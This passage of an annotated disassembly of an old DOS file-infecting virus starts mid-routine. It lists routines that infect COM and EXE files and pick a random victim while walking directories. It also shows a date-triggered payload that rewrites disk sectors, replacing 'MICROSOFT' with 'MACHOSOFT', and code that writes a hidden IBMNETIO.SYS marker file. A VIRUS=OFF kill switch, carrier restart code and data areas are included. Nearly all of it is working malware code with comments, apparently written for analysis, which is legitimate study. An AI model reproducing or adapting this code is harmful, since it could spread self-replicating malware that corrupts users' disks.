0493 A31600 MOV [0016],AX
|
||
|
0496 5E POP SI
|
||
|
0497 5F POP DI
|
||
|
0498 5A POP DX
|
||
|
0499 59 POP CX
|
||
|
049A 5B POP BX
|
||
|
049B 58 POP AX
|
||
|
049C C3 RET
|
||
|
|
||
|
;-------------
|
||
|
; infect file
|
||
|
|
||
|
049D 50 PUSH AX
|
||
|
049E 52 PUSH DX
|
||
|
049F FF060008 INC WORD PTR [0800] ; number of generation
|
||
|
04A3 BABA08 MOV DX,08BA ; buffer for file name
|
||
|
04A6 E837FD CALL 01E0 ; get file parameters and open it
|
||
|
|
||
|
04A9 7228 JB 04D3
|
||
|
|
||
|
04AB B8F0F0 MOV AX,F0F0
|
||
|
04AE E8A8FB CALL 0059 ; get random number less than AX
|
||
|
|
||
|
04B1 A31400 MOV [0014],AX ; key for decryption
|
||
|
04B4 E8CBFD CALL 0282 ; move file pointer at the beginning of file
|
||
|
|
||
|
04B7 721A JB 04D3 ; exit
|
||
|
|
||
|
04B9 833E1E0901 CMP WORD PTR [091E],+01 ; COM?
|
||
|
04BE 7409 JZ 04C9
|
||
|
|
||
|
04C0 833E1E0902 CMP WORD PTR [091E],+02 ; EXE?
|
||
|
04C5 7407 JZ 04CE
|
||
|
|
||
|
04C7 EB0A JMP 04D3 ; exit
|
||
|
|
||
|
04C9 E8F5FD CALL 02C1 ; infect COM file
|
||
|
|
||
|
04CC EB03 JMP 04D1
|
||
|
|
||
|
04CE E8A6FE CALL 0377 ; infect EXE file
|
||
|
|
||
|
04D1 7301 JAE 04D4
|
||
|
|
||
|
04D3 F9 STC
|
||
|
04D4 BABA08 MOV DX,08BA
|
||
|
04D7 9C PUSHF
|
||
|
|
||
|
04D8 E851FD CALL 022C ; restore file parameters and close it
|
||
|
|
||
|
04DB FF0E0008 DEC WORD PTR [0800] ; generation number
|
||
|
|
||
|
04DF 9D POPF
|
||
|
04E0 5A POP DX
|
||
|
04E1 58 POP AX
|
||
|
04E2 C3 RET
|
||
|
|
||
|
;------------------------------------
|
||
|
; get generation number and 0004 info
|
||
|
|
||
|
04E3 833EB60801 CMP WORD PTR [08B6],+01 ; carrier is COM?
|
||
|
04E8 7409 JZ 04F3 ; yes
|
||
|
|
||
|
; EXE
|
||
|
|
||
|
04EA A11600 MOV AX,[0016] ; ??
|
||
|
04ED 8B1E0008 MOV BX,[0800] ; generation number
|
||
|
04F1 EB0F JMP 0502 ; RET
|
||
|
|
||
|
; COM
|
||
|
|
||
|
04F3 06 PUSH ES
|
||
|
04F4 8E06B008 MOV ES,[08B0] ; code segment of carrier
|
||
|
04F8 26 ES:
|
||
|
04F9 A10401 MOV AX,[0104] ; ??
|
||
|
04FC 26 ES:
|
||
|
04FD 8B1E0201 MOV BX,[0102] ; ??
|
||
|
0501 07 POP ES
|
||
|
0502 C3 RET
|
||
|
|
||
|
;---------------------------
|
||
|
; read IBMNETIO.SYS file
|
||
|
|
||
|
0503 53 PUSH BX
|
||
|
0504 51 PUSH CX
|
||
|
0505 52 PUSH DX
|
||
|
0506 A04E08 MOV AL,[084E] ; drive number
|
||
|
0509 0441 ADD AL,41 ; convert to letter
|
||
|
050B A26508 MOV [0865],AL ; store it
|
||
|
050E B8003D MOV AX,3D00 ; open file, for read only
|
||
|
0511 BA6508 MOV DX,0865 ; X:\IBMNETIO.SYS,0
|
||
|
0514 CD21 INT 21
|
||
|
0516 7304 JAE 051C
|
||
|
|
||
|
0518 33C0 XOR AX,AX
|
||
|
051A EB17 JMP 0533 ; exit
|
||
|
|
||
|
051C 8BD8 MOV BX,AX
|
||
|
051E B43F MOV AH,3F ; read file
|
||
|
0520 B90200 MOV CX,0002
|
||
|
0523 BA4F08 MOV DX,084F
|
||
|
0526 CD21 INT 21
|
||
|
0528 72EE JB 0518
|
||
|
|
||
|
052A B43E MOV AH,3E ; Close file
|
||
|
052C CD21 INT 21
|
||
|
052E 72E8 JB 0518
|
||
|
|
||
|
0530 A14F08 MOV AX,[084F] ; IBMNETIO.SYS contens
|
||
|
0533 5A POP DX
|
||
|
0534 59 POP CX
|
||
|
0535 5B POP BX
|
||
|
0536 C3 RET
|
||
|
|
||
|
;---------------------------
|
||
|
; create file IBMNETIO.SYS
|
||
|
|
||
|
0537 50 PUSH AX
|
||
|
0538 53 PUSH BX
|
||
|
0539 51 PUSH CX
|
||
|
053A 52 PUSH DX
|
||
|
053B A34F08 MOV [084F],AX ; store IBMNETIO.SYS contens
|
||
|
053E B43C MOV AH,3C ; create handle
|
||
|
0540 B90600 MOV CX,0006 ; attributes System and Hiden
|
||
|
0543 BA6508 MOV DX,0865 ; file name
|
||
|
0546 CD21 INT 21
|
||
|
|
||
|
0548 8BD8 MOV BX,AX ; file handle
|
||
|
054A B440 MOV AH,40 ; write file
|
||
|
054C B90200 MOV CX,0002 ; number of bytes
|
||
|
054F BA4F08 MOV DX,084F ; buffer
|
||
|
0552 CD21 INT 21
|
||
|
|
||
|
0554 B43E MOV AH,3E ; close file
|
||
|
0556 CD21 INT 21
|
||
|
|
||
|
0558 5A POP DX
|
||
|
0559 59 POP CX
|
||
|
055A 5B POP BX
|
||
|
055B 58 POP AX
|
||
|
055C C3 RET
|
||
|
|
||
|
;--------------------------------------------------------------
|
||
|
; routine called if system date is set after January 1, 1985
|
||
|
; it search disk and replaces string Microsoft onto Machosoft
|
||
|
|
||
|
055D 50 PUSH AX
|
||
|
055E 53 PUSH BX
|
||
|
055F 51 PUSH CX
|
||
|
0560 52 PUSH DX
|
||
|
0561 56 PUSH SI
|
||
|
0562 57 PUSH DI
|
||
|
0563 06 PUSH ES
|
||
|
0564 8CD8 MOV AX,DS
|
||
|
0566 8EC0 MOV ES,AX
|
||
|
0568 E878FF CALL 04E3 ; get generation number and 0004 info
|
||
|
056B 40 INC AX
|
||
|
056C 3D0400 CMP AX,0004
|
||
|
056F 7502 JNZ 0573
|
||
|
|
||
|
0571 33C0 XOR AX,AX
|
||
|
|
||
|
0573 E87DFB CALL 00F3 ; modify 0004 in carrier file on disk
|
||
|
0576 B419 MOV AH,19 ; get current disk
|
||
|
0578 CD21 INT 21
|
||
|
|
||
|
057A A24E08 MOV [084E],AL ; current drive
|
||
|
057D B436 MOV AH,36 ; get disk free
|
||
|
057F 8A164E08 MOV DL,[084E] ; for current drive
|
||
|
0583 FEC2 INC DL
|
||
|
0585 CD21 INT 21
|
||
|
|
||
|
0587 81F90004 CMP CX,0400 ; bytes per sector
|
||
|
058B 7E03 JLE 0590
|
||
|
|
||
|
058D E9AF00 JMP 063F ; sectors too big for my buffer!
|
||
|
|
||
|
0590 890E7409 MOV [0974],CX ; bytes per sector
|
||
|
0594 F7E2 MUL DX ; total number of clusters on disk
|
||
|
0596 A37709 MOV [0977],AX ; number of sectors on disk
|
||
|
0599 E867FF CALL 0503 ; read IBMNETIO.SYS file
|
||
|
|
||
|
059C A37009 MOV [0970],AX ; number of sector to start search
|
||
|
059F B82000 MOV AX,0020 ; number of sectors to search
|
||
|
05A2 A37209 MOV [0972],AX
|
||
|
|
||
|
05A5 A17009 MOV AX,[0970]
|
||
|
05A8 3B067709 CMP AX,[0977] ; last sector?
|
||
|
05AC 7206 JB 05B4 ; no
|
||
|
|
||
|
05AE C70670090000 MOV WORD PTR [0970],0000 ; reset counter
|
||
|
|
||
|
05B4 8B167009 MOV DX,[0970] ; sector
|
||
|
05B8 A04E08 MOV AL,[084E] ; drive
|
||
|
05BB BB7909 MOV BX,0979 ; DTA
|
||
|
05BE B90100 MOV CX,0001 ; number of sectors
|
||
|
05C1 CD25 INT 25 ; read disk sectors
|
||
|
|
||
|
05C3 58 POP AX ; balance stack
|
||
|
05C4 72C7 JB 058D ; exit
|
||
|
|
||
|
05C6 C606760900 MOV BYTE PTR [0976],00 ; flag, sector readed
|
||
|
05CB 90 NOP
|
||
|
05CC BF0000 MOV DI,0000 ; start of buffer
|
||
|
|
||
|
05CF BE5108 MOV SI,0851 ; address of string 'MICROSOFT'
|
||
|
|
||
|
05D2 8A04 MOV AL,[SI]
|
||
|
05D4 46 INC SI
|
||
|
05D5 0AC0 OR AL,AL
|
||
|
05D7 7411 JZ 05EA
|
||
|
|
||
|
05D9 32857909 XOR AL,[DI+0979]
|
||
|
05DD 47 INC DI
|
||
|
05DE 3B3E7409 CMP DI,[0974] ; bytes per sector
|
||
|
05E2 742D JZ 0611
|
||
|
|
||
|
05E4 24DF AND AL,DF ; convert to upper case ?
|
||
|
05E6 75E7 JNZ 05CF ; start again
|
||
|
|
||
|
05E8 EBE8 JMP 05D2 ; check next character
|
||
|
|
||
|
05EA C606760901 MOV BYTE PTR [0976],01 ; founded
|
||
|
05EF 90 NOP
|
||
|
05F0 56 PUSH SI
|
||
|
05F1 57 PUSH DI
|
||
|
05F2 51 PUSH CX
|
||
|
05F3 BE5B08 MOV SI,085B ; string 'MACHOSOFT'
|
||
|
05F6 B90900 MOV CX,0009 ; length
|
||
|
05F9 90 NOP
|
||
|
05FA 2BF9 SUB DI,CX ; change MICRO to MACHO in buffer
|
||
|
|
||
|
05FC 8A857909 MOV AL,[DI+0979]
|
||
|
0600 2420 AND AL,20 ; ' '
|
||
|
0602 0A04 OR AL,[SI]
|
||
|
0604 88857909 MOV [DI+0979],AL
|
||
|
0608 46 INC SI
|
||
|
0609 47 INC DI
|
||
|
060A E2F0 LOOP 05FC
|
||
|
|
||
|
060C 59 POP CX
|
||
|
060D 5F POP DI
|
||
|
060E 5E POP SI
|
||
|
060F EBBE JMP 05CF ; look for next ocurence of Micro...
|
||
|
|
||
|
0611 A07609 MOV AL,[0976] ; buffer changed?
|
||
|
0614 0AC0 OR AL,AL
|
||
|
0616 7502 JNZ 061A ; yes
|
||
|
|
||
|
0618 EB12 JMP 062C ; test next sector
|
||
|
|
||
|
061A A04E08 MOV AL,[084E] ; drive
|
||
|
061D BB7909 MOV BX,0979 ; DTA
|
||
|
0620 B90100 MOV CX,0001 ; number of sectors
|
||
|
0623 8B167009 MOV DX,[0970] ; sector
|
||
|
0627 CD26 INT 26 ; wirte sector
|
||
|
|
||
|
0629 58 POP AX
|
||
|
062A 7213 JB 063F ; exit
|
||
|
|
||
|
062C FF067009 INC WORD PTR [0970] ; sector number
|
||
|
0630 FF0E7209 DEC WORD PTR [0972] ; sectors counter
|
||
|
0634 7403 JZ 0639 ; all sectors tested
|
||
|
|
||
|
0636 E96CFF JMP 05A5 ; search next sector
|
||
|
|
||
|
0639 A17009 MOV AX,[0970] ; sector number
|
||
|
063C E8F8FE CALL 0537 ; create file IBMNETIO.SYS
|
||
|
|
||
|
063F 07 POP ES
|
||
|
0640 5F POP DI
|
||
|
0641 5E POP SI
|
||
|
0642 5A POP DX
|
||
|
0643 59 POP CX
|
||
|
0644 5B POP BX
|
||
|
0645 58 POP AX
|
||
|
0646 C3 RET
|
||
|
|
||
|
;----------------------------------------------
|
||
|
; search enviroment block for string VIRUS=OFF
|
||
|
; if present then set carry
|
||
|
|
||
|
0647 51 PUSH CX
|
||
|
0648 57 PUSH DI
|
||
|
0649 56 PUSH SI
|
||
|
064A 06 PUSH ES
|
||
|
064B 8E06B208 MOV ES,[08B2] ; segment of carrier
|
||
|
064F 26 ES:
|
||
|
0650 8E062C00 MOV ES,[002C] ; segment of enviroment block
|
||
|
0654 33FF XOR DI,DI ; beginning of enviroment
|
||
|
|
||
|
0656 BE7508 MOV SI,0875 ; string VIRUS=OFF
|
||
|
0659 B90A00 MOV CX,000A ; size
|
||
|
065C 90 NOP
|
||
|
065D F3 REPZ
|
||
|
065E A6 CMPSB ; compare strings
|
||
|
065F 7413 JZ 0674 ; founded!
|
||
|
|
||
|
0661 26 ES:
|
||
|
0662 803D00 CMP BYTE PTR [DI],00 ; end of string marker
|
||
|
0665 7403 JZ 066A ; yes
|
||
|
|
||
|
0667 47 INC DI ; look for end of string
|
||
|
0668 EBF7 JMP 0661
|
||
|
|
||
|
066A 47 INC DI ; point at next string
|
||
|
066B 26 ES:
|
||
|
066C 803D00 CMP BYTE PTR [DI],00 ; end of enviroment?
|
||
|
066F 75E5 JNZ 0656 ; no
|
||
|
|
||
|
0671 F8 CLC ; string not found
|
||
|
0672 EB01 JMP 0675
|
||
|
|
||
|
0674 F9 STC ; string founded
|
||
|
|
||
|
0675 07 POP ES
|
||
|
0676 5E POP SI
|
||
|
0677 5F POP DI
|
||
|
0678 59 POP CX
|
||
|
0679 C3 RET
|
||
|
|
||
|
;========================
|
||
|
; main virus entry point
|
||
|
|
||
|
067A A3AE08 MOV [08AE],AX ; AX
|
||
|
067D 891EB608 MOV [08B6],BX ; carrier type (COM/EXE)
|
||
|
0681 890EB208 MOV [08B2],CX ; DS
|
||
|
0685 8916B008 MOV [08B0],DX ; CS
|
||
|
0689 893EB408 MOV [08B4],DI ; top of private stack
|
||
|
|
||
|
068D E8B7FF CALL 0647 ; search enviroment for string VIRUS=OFF
|
||
|
0690 7303 JAE 0695 ; not found
|
||
|
|
||
|
0692 E9E900 JMP 077E ; founded, start carrier
|
||
|
|
||
|
0695 E84BFE CALL 04E3 ; get generation number and 0004 info
|
||
|
0698 3D0000 CMP AX,0000 ; 0004 info ??
|
||
|
069B 7403 JZ 06A0
|
||
|
|
||
|
069D E9CB00 JMP 076B ; check disk and start carrier
|
||
|
|
||
|
06A0 E811FA CALL 00B4 ; get DOS version
|
||
|
06A3 3C02 CMP AL,02 ; 2.x
|
||
|
06A5 750E JNZ 06B5
|
||
|
|
||
|
06A7 B80500 MOV AX,0005
|
||
|
06AA E8ACF9 CALL 0059 ; get random number less than AX
|
||
|
06AD 3D0100 CMP AX,0001
|
||
|
06B0 7403 JZ 06B5
|
||
|
|
||
|
06B2 E9B600 JMP 076B ; check disk and start carrier
|
||
|
|
||
|
06B5 B41A MOV AH,1A ; set DTA
|
||
|
06B7 BA2609 MOV DX,0926 ; buffer
|
||
|
06BA CD21 INT 21
|
||
|
|
||
|
06BC C606BA0800 MOV BYTE PTR [08BA],00 ; mark empty buffer
|
||
|
06C1 90 NOP
|
||
|
|
||
|
06C2 BFBA08 MOV DI,08BA ; file name buffer
|
||
|
06C5 B92003 MOV CX,0320 ; length
|
||
|
06C8 32C0 XOR AL,AL
|
||
|
06CA F2 REPNZ
|
||
|
06CB AE SCASB
|
||
|
06CC 4F DEC DI
|
||
|
06CD C6055C MOV BYTE PTR [DI],5C ; '\'
|
||
|
06D0 C645012A MOV BYTE PTR [DI+01],2A ; '*'
|
||
|
06D4 C645022E MOV BYTE PTR [DI+02],2E ; '.'
|
||
|
06D8 C645032A MOV BYTE PTR [DI+03],2A ; '*'
|
||
|
06DC C6450400 MOV BYTE PTR [DI+04],00 ; end of string marker
|
||
|
06E0 BB0000 MOV BX,0000 ; counter of founded entries
|
||
|
06E3 BABA08 MOV DX,08BA ; file name
|
||
|
06E6 B44E MOV AH,4E ; find first
|
||
|
06E8 B93900 MOV CX,0039 ; attributes (skip System and Hiden)
|
||
|
06EB CD21 INT 21
|
||
|
|
||
|
06ED 720F JB 06FE
|
||
|
|
||
|
06EF E885FA CALL 0177 ; analyse DTA file name
|
||
|
06F2 3D0000 CMP AX,0000 ; nothing interesting
|
||
|
06F5 7401 JZ 06F8 ; find next
|
||
|
|
||
|
06F7 43 INC BX ; increase counter
|
||
|
|
||
|
06F8 B44F MOV AH,4F ; find next
|
||
|
06FA CD21 INT 21
|
||
|
06FC EBEF JMP 06ED
|
||
|
|
||
|
06FE 0BDB OR BX,BX ; is anything interesting on disk?
|
||
|
0700 7503 JNZ 0705
|
||
|
|
||
|
0702 EB7A JMP 077E ; start carrier
|
||
|
0704 90 NOP
|
||
|
|
||
|
0705 8BC3 MOV AX,BX ; counter
|
||
|
0707 48 DEC AX
|
||
|
0708 E84EF9 CALL 0059 ; get random number less than AX
|
||
|
070B 40 INC AX
|
||
|
070C 8BD8 MOV BX,AX ; store number of candidate
|
||
|
070E BABA08 MOV DX,08BA ; path for find first
|
||
|
0711 B44E MOV AH,4E ; find first
|
||
|
0713 B93900 MOV CX,0039
|
||
|
0716 CD21 INT 21
|
||
|
0718 7303 JAE 071D
|
||
|
|
||
|
071A EB62 JMP 077E ; start carrier
|
||
|
071C 90 NOP
|
||
|
|
||
|
071D E857FA CALL 0177 ; analyse DTA file name
|
||
|
0720 3D0000 CMP AX,0000
|
||
|
0723 7415 JZ 073A
|
||
|
|
||
|
0725 4B DEC BX
|
||
|
0726 7512 JNZ 073A
|
||
|
|
||
|
0728 3D0300 CMP AX,0003 ; subdirectory
|
||
|
072B 7413 JZ 0740
|
||
|
|
||
|
072D 3D0100 CMP AX,0001 ; COM
|
||
|
0730 7425 JZ 0757
|
||
|
|
||
|
0732 3D0200 CMP AX,0002 ; EXE
|
||
|
0735 7420 JZ 0757
|
||
|
|
||
|
0737 EB45 JMP 077E ; start carrier
|
||
|
0739 90 NOP
|
||
|
|
||
|
073A B44F MOV AH,4F ; find next
|
||
|
073C CD21 INT 21
|
||
|
073E EBD8 JMP 0718
|
||
|
|
||
|
; subdirectory, expand path and search again
|
||
|
|
||
|
0740 BFBA08 MOV DI,08BA
|
||
|
0743 8BCF MOV CX,DI
|
||
|
0745 32C0 XOR AL,AL
|
||
|
0747 F2 REPNZ
|
||
|
0748 AE SCASB
|
||
|
0749 83EF04 SUB DI,+04
|
||
|
074C BE4409 MOV SI,0944
|
||
|
074F B90D00 MOV CX,000D
|
||
|
0752 F3 REPZ
|
||
|
0753 A4 MOVSB
|
||
|
0754 E96BFF JMP 06C2
|
||
|
|
||
|
; founded COM or EXE file
|
||
|
|
||
|
0757 A31E09 MOV [091E],AX ; file type (COM/EXE)
|
||
|
075A E806FB CALL 0263 ; add file name to path
|
||
|
075D E83DFD CALL 049D ; infect file
|
||
|
0760 7207 JB 0769
|
||
|
|
||
|
0762 E87EFD CALL 04E3 ; get generation number and 0004 info
|
||
|
0765 40 INC AX
|
||
|
|
||
|
0766 E88AF9 CALL 00F3 ; modify 0004 in carrier file on disk
|
||
|
0769 EB13 JMP 077E ; start carrier
|
||
|
|
||
|
076B B42A MOV AH,2A ; get date
|
||
|
076D CD21 INT 21
|
||
|
|
||
|
076F 3B0E1000 CMP CX,[0010] ; year
|
||
|
0773 7209 JB 077E ; start carrier
|
||
|
|
||
|
0775 3B161200 CMP DX,[0012] ; month, day
|
||
|
0779 7203 JB 077E ; start carrier
|
||
|
|
||
|
077B E8DFFD CALL 055D ; extra disk activity
|
||
|
|
||
|
077E 1E PUSH DS
|
||
|
077F A1B208 MOV AX,[08B2] ; carrier DS
|
||
|
0782 8ED8 MOV DS,AX
|
||
|
0784 BA8000 MOV DX,0080 ; restore DTA
|
||
|
0787 B41A MOV AH,1A ; set DTA
|
||
|
0789 CD21 INT 21
|
||
|
|
||
|
078B 1F POP DS
|
||
|
078C 833EB60801 CMP WORD PTR [08B6],+01 ; COM?
|
||
|
0791 740B JZ 079E
|
||
|
|
||
|
0793 833EB60802 CMP WORD PTR [08B6],+02 ; EXE?
|
||
|
0798 7424 JZ 07BE
|
||
|
|
||
|
079A B44C MOV AH,4C ; terminate
|
||
|
079C CD21 INT 21
|
||
|
|
||
|
; start carrier COM file
|
||
|
|
||
|
079E A1B008 MOV AX,[08B0] ; carrier CS
|
||
|
07A1 8EC0 MOV ES,AX
|
||
|
07A3 B92300 MOV CX,0023 ; number of bytes
|
||
|
07A6 90 NOP
|
||
|
07A7 BE2108 MOV SI,0821 ; oryginal carrier bytes
|
||
|
07AA BF0001 MOV DI,0100 ; destination
|
||
|
07AD F3 REPZ
|
||
|
07AE A4 MOVSB
|
||
|
07AF 8CC1 MOV CX,ES
|
||
|
07B1 BA0001 MOV DX,0100
|
||
|
07B4 8CC0 MOV AX,ES
|
||
|
07B6 8ED0 MOV SS,AX
|
||
|
07B8 8B26B408 MOV SP,[08B4]
|
||
|
07BC EB1C JMP 07DA
|
||
|
|
||
|
; start carrier EXE file
|
||
|
|
||
|
07BE 8CC8 MOV AX,CS
|
||
|
07C0 2B064C08 SUB AX,[084C]
|
||
|
07C4 8B0E4808 MOV CX,[0848]
|
||
|
07C8 03C8 ADD CX,AX
|
||
|
07CA 8ED1 MOV SS,CX
|
||
|
07CC 8B264A08 MOV SP,[084A]
|
||
|
07D0 8B0E4408 MOV CX,[0844]
|
||
|
07D4 03C8 ADD CX,AX
|
||
|
07D6 8B164608 MOV DX,[0846]
|
||
|
|
||
|
; common code for COM and EXE
|
||
|
|
||
|
07DA 8916FA07 MOV [07FA],DX ; patch destination address
|
||
|
07DE 890EFC07 MOV [07FC],CX
|
||
|
07E2 A1AE08 MOV AX,[08AE] ; restore registers
|
||
|
07E5 8B0EB208 MOV CX,[08B2]
|
||
|
07E9 8ED9 MOV DS,CX
|
||
|
07EB 8EC1 MOV ES,CX
|
||
|
07ED 33DB XOR BX,BX
|
||
|
07EF 8BCB MOV CX,BX
|
||
|
07F1 8BD3 MOV DX,BX
|
||
|
07F3 8BF3 MOV SI,BX
|
||
|
07F5 8BFB MOV DI,BX
|
||
|
07F7 8BEB MOV BP,BX
|
||
|
|
||
|
; destination address will be patched
|
||
|
|
||
|
07F9 EA00000000 JMP 0000:0000 ; jump to aplication
|
||
|
|
||
|
;***************************************
|
||
|
; working area
|
||
|
|
||
|
;-------------------
|
||
|
; COM file loader
|
||
|
|
||
|
07FE EB14 JMP 0814
|
||
|
0800 1400 ; generation number
|
||
|
0802 0000
|
||
|
0804 0200
|
||
|
0806 0000
|
||
|
0808 0000
|
||
|
080A 0000
|
||
|
080C 0000
|
||
|
080E 39 28 46 03 03 01 ; virus signature in COM file
|
||
|
|
||
|
0814 8C C9 MOV CX,CS
|
||
|
0816 8B D1 MOV DX,CX
|
||
|
0818 81 C1 21 00 ADD CX,0021h ; word 081A will be modyfied by wirus
|
||
|
081C 51 PUSH CX
|
||
|
081D 33 C9 XOR CX,CX
|
||
|
081F 51 PUSH CX
|
||
|
0820 CB RETF
|
||
|
|
||
|
;-----------------------------------------
|
||
|
; first 35 oryginal bytes of victim (COM)
|
||
|
|
||
|
0821 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
|
||
|
0830 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
|
||
|
0840 90 90 90 90
|
||
|
|
||
|
;-----------------------------
|
||
|
; date for EXE carrier
|
||
|
|
||
|
0844 20 00 ; carrier CS
|
||
|
0846 00 00 ; carrier IP
|
||
|
0848 00 00 ; carrier SS
|
||
|
084A 00 02 ; carrier SP
|
||
|
084C 51 02 ; virus position in file
|
||
|
|
||
|
;---------------
|
||
|
; working area
|
||
|
|
||
|
084E 00 ; drive number
|
||
|
084F 00 00 ; buffer for IBMNETIO.SYS file
|
||
|
|
||
|
;----------------------
|
||
|
; some special strings
|
||
|
|
||
|
0851 4D 49 43 52 4F 53 4F 46 54 00 ; MICROSOFT.
|
||
|
085B 4D 41 43 48 4F 53 4F 46 54 00 ; MACHOSOFT.
|
||
|
0865 20 ; drive (letter)
|
||
|
0866 3A 5C 49 42 4D 4E 45 54 49 4F 2E 53 59 53 00 ; :\IBMNETIO.SYS.
|
||
|
0875 56 49 52 55 53 3D 4F 46 46 00 ; string VIRUS=OFF
|
||
|
|
||
|
;------------------------------------------
|
||
|
; buffer for first 35 bytes of *.COM files
|
||
|
|
||
|
087F 90
|
||
|
0880 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
|
||
|
0890 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
|
||
|
08A0 90 90
|
||
|
08A2 00 00
|
||
|
08A4 B8 4A
|
||
|
08A6 B1 17
|
||
|
08A8 2C 65
|
||
|
08AA 53 16
|
||
|
08AC 00 00 ; ??
|
||
|
|
||
|
08AE 00 00 ; AX holder
|
||
|
08B0 C8 0D ; carrier code segment (CS)
|
||
|
08B2 C8 0D ; carrier data segment (DS)
|
||
|
08B4 DD 0D ; top of stack
|
||
|
08B6 02 00 ; type of carrier 1 - EXE, 2 - COM
|
||
|
|
||
|
08B8 00 00 ; buffer for 0004 location in COM and CS:0004 in EXE
|
||
|
|
||
|
; buffer for path and file name
|
||
|
|
||
|
08BA 5C 56 43 31 30 30 30 2E 43 4F 4D 00 \VC1000.COM.
|
||
|
08C6 00 00 00 45 00 00 4F 4D 00 4F 0.COM....E..OM.O
|
||
|
08D0 4D 00 54 00 00 42 00 00-00 00 00 00 00 00 00 00 M.T..B..........
|
||
|
08E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||
|
08F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||
|
0900 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||
|
0910 00 00 00 00 00 00 00 00-00 00 00 00 00 00
|
||
|
|
||
|
091E 01 00 ; COM/EXE flag
|
||
|
0920 20 00 ; attribute of victim
|
||
|
0922 41 15 ; date stamp of victim
|
||
|
0924 35 A9 ; time stamp of victim
|
||
|
|
||
|
; local DTA
|
||
|
|
||
|
0926 02 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 39 00 00 00 00 00 00 00 00 ; reserved
|
||
|
093B 20 ; attributes
|
||
|
093C 35 A9 ; time stamp
|
||
|
094E 41 15 ; date stamp
|
||
|
0940 E8 03 ; file size (low word)
|
||
|
0942 00 00 ; file size
|
||
|
0944 56 43 31 30 30 30 2E 43 4F 4D 00 00 00 ; VC1000.COM... file name
|
||
|
|
||
|
0951 90
|
||
|
0952 05 00 ; file handle holder
|
||
|
|
||
|
; buffer for EXE header (1C bytes)
|
||
|
|
||
|
0954 4D 5A ; MZ marker
|
||
|
0956 EF 00 ; Part Page
|
||
|
0958 1B 00 ; Page Count
|
||
|
095A 00 00 ; Relo Count
|
||
|
095C 20 00 ; Header Size
|
||
|
095E 00 00 ; MinMem
|
||
|
0960 FF FF ; MaxMem
|
||
|
0962 51 02 ; SS
|
||
|
0964 DD 0D ; SP
|
||
|
0966 B6 7C ; check sum
|
||
|
0968 06 00 ; IP
|
||
|
096A 51 02 ; CS
|
||
|
096C 3E 00 ; TablOffs
|
||
|
096E 00 00 ; Overlay number
|
||
|
|
||
|
0970 00 00 ; first dector to read
|
||
|
0972 00 00 ; sectors counter
|
||
|
0974 00 00 ; bytes per sector
|
||
|
0976 00 ; flag, 0 - 'MICROSOFT' not founded, 1 - founded
|
||
|
0977 00 00 ; total number of sectors on disk
|
||
|
|
||
|
; buffer for disk sectors
|
||
|
|
||
|
0979 DB 400h DUP (0)
|
||
|
|
||
|
; private stack
|
||
|
|
||
|
0D79 53 54 41 43 4B 53 54 STACKST
|
||
|
0D80 41 43 4B 53 54 41 43 4B-53 54 41 43 4B 53 54 41 ACKSTACKSTACKSTA
|
||
|
0D90 43 4B 53 54 41 43 4B 53-54 2C 09 1C 09 D1 03 32 CKSTACKST,...Q.2
|
||
|
0DA0 08 00 00 58 02 6C 15 F0-03 05 00 00 00 00 00 23 ...X.l.p.......#
|
||
|
0DB0 40 05 00 DF 0D 00 00 0F-08 32 08 82 08 29 10 29 @.._.....2...).)
|
||
|
0DC0 10 55 00 29 10 02 F2 62-03 BA 08 06 00 BA 08 01 .U.)..rb.:...:..
|
||
|
0DD0 00 00 01 BB 0A 00 00 2F-00 AC 2F 63 12 00 00
|
||
|
|